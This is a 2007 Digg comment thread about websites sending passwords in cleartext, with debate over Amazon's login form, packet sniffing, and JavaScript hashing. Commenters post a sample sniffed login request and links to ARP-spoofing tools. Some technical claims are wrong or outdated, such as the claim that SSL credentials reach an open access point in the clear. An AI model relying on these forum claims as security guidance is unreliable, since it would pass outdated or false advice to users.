What is Digg?98 Comments
- quasipalm, on 10/12/2007, -3/+57Not to mention that some of these are misleading. Amazon does not use cleartext by default. The default is encrypted. However, if your browser doesn't cooperate, you can login with cleartext.
It's a feature, not a bug, in this case. You actually have to try and be insecure on Amazon. - inactive, on 10/12/2007, -20/+51Really, this is old news. A lot of people still don't realize what this even means, of course. This, however, is just another example of a stupid weblogger stating the obvious in an attempt to sound officiating or intelligent. OMG HTTP requests in the clear!!!! Ten bucks says the guy updates his website with FTP anyway.
- merreborn, on 10/12/2007, -1/+30The defcon wall of sheep only worked because it was sniffing data sent by defcon attendants over the defcon network.
So, yeah, if you can't trust your own LAN, you have something to worry about. In reality, if you've got a single PC at home, hooked directly to your DSL modem, passwords sent in the clear are very, very rarely going to be sniffed, as it would require either your ISP or the site you're logging in to to be compromised. If the site you're logging into is compromised, SSL isn't going to help you most of the time anyway. - houdoken, on 10/12/2007, -1/+24MY_PASSWORD_FLAPPING_IN_THE_WIND was pretty amusing :D
- inactive, on 10/12/2007, -2/+24You know, it's pretty simple to look for "https" instead of "http".
- MicrowavedH2o, on 10/12/2007, -5/+23damn man, learn to wrap your text... my monitor isn't that wide.
- Chewie67, on 10/12/2007, -1/+17@AICkieran - "Yeah, i mean god forbid anyone comment on a story or digg something using our usernames eh?"
Of course, that's not a major issue.
What is a major issue, however, is that many FOOLISH people use the same password everywhere. So, the same password (and username) they use on Digg also gets used on their Citibank account. Once you find it on Digg, you can use it on Citibank...and Amazon.com...and Buy.com...and every other flippin' web site that person has ever signed up for.
That's the danger of clear text passwords... - Jaymoon, on 10/12/2007, -1/+15But if you are using NetZero... 90% chance you have dialup....
Who is sniffing dialup traffic, and how would that even be possible unless it's coming from NetZero's end? - Anth, on 10/12/2007, -3/+17@rkuchiki
WTF? Most Cable ISPs has had peer to peer turned off since 1999. You cant see your neighbor's traffic at all. - davdav, on 10/12/2007, -0/+12Same with Juno, and who uses Cox Webmail? Honestly. Worst interface ever.
- WhackingDay, on 10/12/2007, -1/+12Wow.. I sure wouldn't want anyone to have access to my Classmates.com account. ONOZ!!one!one!!.
- Snuffkin, on 10/12/2007, -2/+11It doesn't matter what Amazon 'defaults' to, they DO NOT IMPLEMENT SSL CORRECTLY.
Try the following: Go to Amazon, log out if you're signed in, and go to the sign in page. It probably says something like 'The secure server will encrypt your information'. However, if you look at the URL, you will see quite plainly that it is standard HTTP.
This approach is not uncommon (having the actual login page unencrypted, and only having the form post over HTTPS), but it is severely flawed.
Because the login page is unencrypted, anyone with access to intercept data going over the wire could alter the login page so that the form posts to some other site that captures the passwords submitted to it. You'd never even get warned, because it's not like anyone keeps 'warn me when submitting unencrypted data' on.
SSL is not just about encryption. It is about verifying the identity of the remote party. Not encrypting the login form completely defeats this, as you don't get an opportunity to verify the party before submitting your details.
Assuming everything is normal, sure, your details will go encrypted over the wire. Anyone with the ability to alter data as it goes over the wire can still capture your Amazon login very, very easily. - paulmdx, on 10/12/2007, -0/+8Fragment from Ethereal:
"Host: www.digg.com Content-Length: 91 Connection: Keep-Alive
Cache-Control: no-cacheCookie: PHPSESSID=8dde830b0852d127bfbe48a253a8f796
username=paulmdx&password=zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzz&processlogin=1"
(My password isn't really lots of z's by the way, so don't try "pwning" my account.) - Blazeix, on 10/12/2007, -0/+8If you use a modern browser your password will be encrypted when using amazon. It's the old browsers that don't support encryption that transfer the password in plain text.
- Thud, on 10/12/2007, -1/+9@rkuchiki
It's true that cable modems share RF bandwidth (on a segment) but you can NOT sniff your neighbor's packets over a cable modem.
The only packets going through the network port on your cable modem are packets destined for your computer (or local network) specifically.
Your modem transmits on a different frequency band than it receives (a smaller subset of the frequency band of one channel)-- so, first of all, it's not even physically possible for your modem to be receiving on the same frequency that your neighbor is transmitting on. So there's no possibility of using your own modem to "sniff" the transmitted data from your neighbor's modem. - grilkip, on 10/12/2007, -1/+8One thing is true anyway, it's not always just the users that are stupid.
- Pile, on 10/12/2007, -3/+9The articles blames the insecurity on the wrong systems. These are only relevant typically if you're running wireless. That's when packet sniffing is most promiscuous, otherwise it would take quite a bit of resources to sniff out even cleartext passwords.
What we learn from this is: DON'T USE WIRELESS. - Flanker, on 10/12/2007, -0/+6True regarding Amazon's login process, but you can just change the http to https manually, and things are better. Annoying to have to remember this though.
- Bradl3y, on 10/12/2007, -0/+6Ever think these people may check their juno or netzero email accounts from their work? What makes you think people would have to sniff their dial-up connection to makes these vulnerabilities a reality?
- Obsidian743, on 10/12/2007, -0/+6The greatest threat to any network are those on the same subnet. Likewise, within any corporate network the greatest threat are the employees on the LAN, not outside intruders.
My company uses several different subnets to separate the departments, i.e. development/IT/tech support/accounting/etc and seems to work quite well in preventing some of the more...tempting...activities. - mattmac24, on 10/12/2007, -1/+7so would i b wrong in assuming that unless the web site uses SSL (https) at the login page to a web site, the password is easy to sniff?
is it just me or does digg put our passwords "flapping in the wind"
would of thought such a highly used web site used by (generally) tech savy people would be better at securing our passwords....of couse i could be completly wrong - paulmdx, on 10/12/2007, -0/+5It's sent plain text according to Ethereal.
- Matt2k, on 10/12/2007, -0/+5> dont packet filters only show the network traffic going through your own NIC.
On most modern switching hubs, this is true (except for broadcast packets). You have to have a monitoring port on your switch, or a router that supports it, or something to that effect
On wireless all packets are sent to everyone of course. Think about it. - AICkieran, on 10/12/2007, -1/+5Yeah, i mean god forbid anyone comment on a story or digg something using our usernames eh?
- Xalorous, on 10/12/2007, -0/+4it's called ssl, and modern browsers use it
- Bobski, on 10/12/2007, -0/+4Jeez - My monitor is in 1280x1024 and the only way to not get a horizontal scroll bar is with the browser at full screen. I never run anything full screen. What an asshat of a site designer.
- wicketr, on 10/12/2007, -0/+3"Because the login page is unencrypted, anyone with access to intercept data going over the wire could alter the login page so that the form posts to some other site that captures the passwords submitted to it. You'd never even get warned, because it's not like anyone keeps 'warn me when submitting unencrypted data' on."
Snuffkin,
I don't believe you are correct about this. As soon as you hit the submit button from the page. It initiates an SSL connection to the page and then transfers the data across the wire. The data is not sent and then encrypted. It doesn't matter if the page you typed it on is SSL or not. What matters is how the data you typed is transmitted over the internet.
Unless you are talking about a hijacked machine that's been compromised already, I'm not aware of a way of what you are describing to be possible. Do you have a link to an example?? - Snuffkin, on 10/12/2007, -0/+3Um, you might want to read up on CHAP authentication techniques. Sites should rarely store passwords unhashed in the database.
- da404lewzer, on 10/12/2007, -0/+3it happens anytime you submit information though a form. like this 'submit comment' form that we use on digg. the data is sent the same way. 90% of all sites are rendered on the server end, so alot of your 'data' you wont see (except on the page render) due to the use of cookies and sessions. the cookie data on your end is usually just a unique id to keep track of your 'session variables' on the servers end. cookie data can be seen in get/post requests, but since sessions are alot safer to use people are using them more...
what about download? any data sent back from the server is also vulnerable for data harvesting... i mean think about it, if your email address is on the screen, or acct #, or whatever, anyone can get that too with a man in the middle attack... - nofxjunkee, on 10/12/2007, -3/+6No kidding. Thank god for copy & pasting into a text editor.
- MarcTheLad, on 10/12/2007, -0/+2arp arp, arp.
- crzdmn, on 10/12/2007, -2/+4After investigating the Amazon security, I can tell you that unless you run some really old browsers you won't expose your username/password in plain-text.
Still it is very disconcerting to see that happen, even in old browsers. Bare minimum the passwords should be encrypted with a rotating site key. - WorldGroove, on 10/12/2007, -0/+2Just so everyone knows, SBCYahoo uses the Challenge/response method... password never crosses the wire. Sniffing doesn't give any info either. (and we're not talking about session-hi-jacking, so don't mention it).
http://en.wikipedia.org/wiki/Challenge-response_authentication - PAJK, on 10/12/2007, -0/+2@Snuffkin:
I'm not talking about storing passwords unhashed in the database. You need to have the password before you can hash it, don't you?
It then must be sent in plain text before it gets to that...and that comes down to the client, whether they support encryption, or javascript-if you decide to use that method.
The Web software needs to the password in plain text before it hashes it and compares it. Read my original comment again. - wicketr, on 10/12/2007, -0/+2Security by obscurity is not a good idea. But it's better than having something called "password" going across the wire. There's a difference between "a bad idea" and "completely stupid and ignorant".
- znsh18, on 10/12/2007, -2/+4Actually I would disagree on who uses cox or juno mail. I agree their interface is horrible.
I am an IT Tech for an ISP provider myself. I can tell you from experience most ISPs dont care much when comes to secure email service for their customer. They just put up a page & ask the customer to either setup a pop3 account in outlook or Eudora. Most ISPs would also ask the customer to disable certain sercurity features in Outlook or others as well. - stygiansonic, on 10/12/2007, -0/+2Read up on CHAP - using client side JavaScript DOES improve things, but not for "encryption", rather using JavaScript to implement hashing functions as part of a challenge-response authentication system.
- dagr8tim, on 10/12/2007, -1/+3Most people don't realize their emails are also sent as clear text after they get past your ISP's server's. What's news here?
- Flanker, on 10/12/2007, -1/+3If you have Opera, just press Ctrl + F11. Fit-width adjustment.
This is not meant to be in defense of the poor web design -- just a tip. - DigeratiPrime, on 10/12/2007, -0/+2get Keepass people its free/opensource and has an excellent password generator and database feature.
http://keepass.sourceforge.net/ - nofxjunkee, on 10/12/2007, -0/+2no, 1280x1024 but I don't browse maximized. the more important thing is I don't *have* to for 95% of websites either.
- Jugalator, on 10/12/2007, -1/+3"If you use any number of popular web forums or even some commercial services like classmates.com, amazon.com, netzero.com or your provider's webmail service, you may not be aware that you're sending your credentials over the internet in the clear."
Huh?? Doesn't both Internet Explorer and Firefox tell you so until you check the box "do not warn me about this in the future"? - ActiveMatx, on 10/12/2007, -0/+2"In its simple form a packet sniffer simply captures all of the packets of data that pass through a given network interface. Typically, the packet sniffer would only capture packets that were intended for the machine in question. However, if placed into promiscuous mode, the packet sniffer is also capable of capturing ALL packets traversing the network regardless of destination."
I guess its easier than I thought.... I have always captured packets for the sake of analyzing my own network traffic. (Never intended on viewing others traffic). I guess I am going to play around with Etheral a bit, to see if I can sniff out the other traffic on my home-network. - stygiansonic, on 10/12/2007, -0/+2Even if SSL or an unencrypted connection is unavailable, there is NO NEED to transmit a password in plaintext. A simple CHAP system can be implemented if the client browser supports JavaScript - and while it's no replacement for https, it's better than nothing. For reference:
http://simon.incutio.com/archive/2003/04/20/javascriptMD5
http://pajhome.org.uk/crypt/md5/
Of course MD5 might not be the best choice anymore, but an SHA-1 algorithm for JavaScript is also available at the second URL. The fact that some of these major websites are not using a simple system like this help with security in their login forms is just stupid, especially since HTTP digest authentication has used it for some time. - Urusai, on 10/12/2007, -0/+2Yahoo! Mail used to use JavaScript to encrypt the password. I think they just use https now.
- DrDabbles, on 10/12/2007, -2/+4Yes. Obfuscate. Because we all know how well the practice of security by obscurity works. It seems to me if "password" the string is sent over SSL it would be pretty obfuscated. Seriously. That is the lamest idea ever posted. Ever.
- tweekgeek, on 10/12/2007, -0/+2Or you can encrypt with a javascript md5 library and send it that way. Yahoo does this, I believe. Cuts down on the cost associated with extra processing for SSL. If the client's disabled JS, well. Then SSL it is.
- Wyzard, on 10/12/2007, -0/+1Even on a switched network, it's possible to set yourself up as a man-in-the-middle to eavesdrop on other nodes' traffic:
http://en.wikipedia.org/wiki/ARP_spoofing
There are readily-available tools to do this:
http://ettercap.sourceforge.net/ - klenwell, on 10/12/2007, -0/+1why I increasingly use http://mushpup.org for low-security websites requiring a password -- that way, if my password is compromised this way on one site, it won't compromise any of my other passwords.
and I can even post a reminder publicly -- here's my digg password:
m{this.domain > msw} - radiofrequency, on 10/12/2007, -0/+1Something else to consider: if you're hooked up to the net via an insecure (non-encrypted) access point, even if the host server uses SSL connections your username and password are sent in the clear to the access point!
-
Show 51 - 95 of 95 discussions
Browsing Digg on your phone just got easier with our enhancements to the 
© Digg Inc. 2009
— Content created and posted by Digg users is